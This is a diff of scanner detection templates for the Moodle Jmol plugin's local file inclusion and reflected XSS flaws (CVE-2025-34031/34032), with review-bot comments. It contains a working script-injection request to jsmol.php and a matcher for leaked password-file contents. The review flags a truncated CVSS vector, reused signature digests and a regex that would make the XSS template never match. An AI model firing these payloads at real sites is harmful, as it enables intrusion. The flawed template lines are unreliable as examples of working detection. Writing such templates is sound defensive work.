diff --git a/http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml b/http/cves/2025/CVE-2025-34031.yaml
similarity index 62%
rename from http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml
rename to http/cves/2025/CVE-2025-34031.yaml
index 0327636fd01b..07ef35b63e74 100644
--- a/http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml
+++ b/http/cves/2025/CVE-2025-34031.yaml
@@ -1,19 +1,22 @@
-id: moodle-filter-jmol-lfi
+id: CVE-2025-34031

 info:
 name: Moodle Jmol Filter 6.1 - Local File Inclusion
 author: madrobot
 severity: high
- description: Moodle is vulnerable to local file inclusion.
+ description: |
+ Moodle Jmol Filter 6.1 is vulnerable to local file inclusion through the jsmol.php file, allowing attackers to read arbitrary files on the server.
 reference:
 - https://www.exploit-db.com/exploits/46881
+ - https://nvd.nist.gov/vuln/detail/CVE-2025-34031
 classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:F/RL:W/RC:C
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N
+ cve-id: CVE-2025-34031
 cvss-score: 7.5
 cwe-id: CWE-22
 metadata:
 max-request: 1
- tags: moodle,lfi,edb
+ tags: cve,cve2025,moodle,lfi,edb,jsmol

 http:
 - method: GET
@@ -22,12 +25,17 @@ http:

 matchers-condition: and
 matchers:
- - type: status
- status:
- - 200
-
 - type: regex
+ part: body
 regex:
 - "root:.*:0:0:"
- part: body
-# digest: 4b0a00483046022100f94185a8eabe63f53fbb9f491b50762b1b2d0cf5e86a0659f1ba8980e32c601102210096118270c1fa4708ceef2e9dac7592366eefe698b670ab81c5867034daa2833f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+
+ - type: word
+ part: content_type
+ words:
+ - "text/plain"
+
+ - type: status
+ status:
+ - 200
+# digest: 4b0a00483046022100f94185a8eabe63f53fbb9f491b50762b1b2d0cf5e86a0659f1ba8980e32c601102210096118270c1fa4708ceef2e9dac7592366eefe698b670ab81c5867034daa2833f:922c64590222798bb761d5b6d8e72950
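Review bot: The new `cvss-metrics` value in the classification block stops at `I:N` and no longer has an Availability metric, which a CVSS 3.1 base vector requires. Removing the temporal suffix `E:F/RL:W/RC:C` appears to have taken `A:N` with it. The unchanged `cvss-score: 7.5` matches the vector with `A:N`, so the line should read `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`.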
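Review bot: The `# digest:` trailer is re-added with exactly the value it had before, although the id, info block and matchers of this template changed, so the signature presumably no longer covers the file content. The new CVE-2025-34032.yaml has the same problem: it carries the digest of the deleted moodle-filter-jmol-xss.yaml. Unless the repository's signing job rewrites these on merge, regenerate both digests rather than carrying them over, so that signature verification of the templates stays meaningful. The request this matcher list belongs to starts above the hunk.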
diff --git a/http/cves/2025/CVE-2025-34032.yaml b/http/cves/2025/CVE-2025-34032.yaml
new file mode 100644
index 000000000000..95c989e25f23
--- /dev/null
+++ b/http/cves/2025/CVE-2025-34032.yaml
@@ -0,0 +1,38 @@
+id: CVE-2025-34032
+
+info:
+ name: Moodle LMS Jmol Plugin <= 6.1 - Cross-Site Scripting
+ author: madrobot,ritikchaddha
+ severity: medium
+ description: |
+ A reflected cross-site scripting (XSS) vulnerability exists in the Moodle LMS Jmol plugin version 6.1 and prior via the data parameter in jsmol.php. The application fails to properly sanitize user input before embedding it into the HTTP response, allowing an attacker to execute arbitrary JavaScript in the victim's browser by crafting a malicious link. This can be used to hijack user sessions or manipulate page content.
+ reference:
+ - https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/
+ - https://nvd.nist.gov/vuln/detail/CVE-2025-34032
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cve-id: CVE-2025-34032
+ cvss-score: 5.4
+ cwe-id: CWE-80
+ metadata:
+ max-request: 1
+ tags: cve,cve2025,moodle,xss,edb
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(document.domain)%3C/script%3E&mimetype=text/html"
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - 'len(body) == 41'
+ - 'status_code == 200'
+ - 'contains(content_type, "text/html")'
+ condition: and
+
+ - type: regex
+ regex:
+ - '^\s*$'
+# digest: 490a0046304402202ce4ab09dfbb0d1a283ed44ecf36d605d0ca9b1daf7c865bc6dff2377cae6fe302201755c894c9fb9d830625ffad6822664793240ae4e1f14fd340b92b5c2be20517:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml b/http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml
deleted file mode 100644
index 8af6bb1e208c..000000000000
--- a/http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml
+++ /dev/null
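Review bot: `len(body) == 41` in the dsl matcher of CVE-2025-34032.yaml is an unexplained constant that presumably encodes the length of the reflected payload from `path` plus trailing bytes, so any change to the `data` value silently breaks detection. A comment above it would help, for example `# 41 = length of the echoed payload as returned by jsmol.php; recompute when the data parameter changes`. The regex matcher as it appears on this page is `^\s*$`, which matches only an empty or all-whitespace body. If that is the real file content rather than a rendering loss, the two matchers can never both pass on a reflected payload and the template would report nothing.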
@@ -1,38 +0,0 @@
-id: moodle-filter-jmol-xss
-
-info:
- name: Moodle Jsmol - Cross-Site Scripting
- author: madrobot
- severity: medium
- description: Moodle contains a cross-site scripting vulnerability via the Jsmol plugin and may also be susceptible to local file inclusion or server-side-request forgery. An attacker can execute arbitrary script in the browser of an unsuspecting user and steal cookie-based authentication credentials and launch other attacks.
- reference:
- - https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 5.4
- cwe-id: CWE-80
- metadata:
- max-request: 1
- tags: moodle,xss
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html"
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - ""
- part: body
-
- - type: word
- part: header
- words:
- - "text/html"
-# digest: 490a0046304402202ce4ab09dfbb0d1a283ed44ecf36d605d0ca9b1daf7c865bc6dff2377cae6fe302201755c894c9fb9d830625ffad6822664793240ae4e1f14fd340b92b5c2be20517:922c64590222798bb761d5b6d8e72950
\ No newline at end of file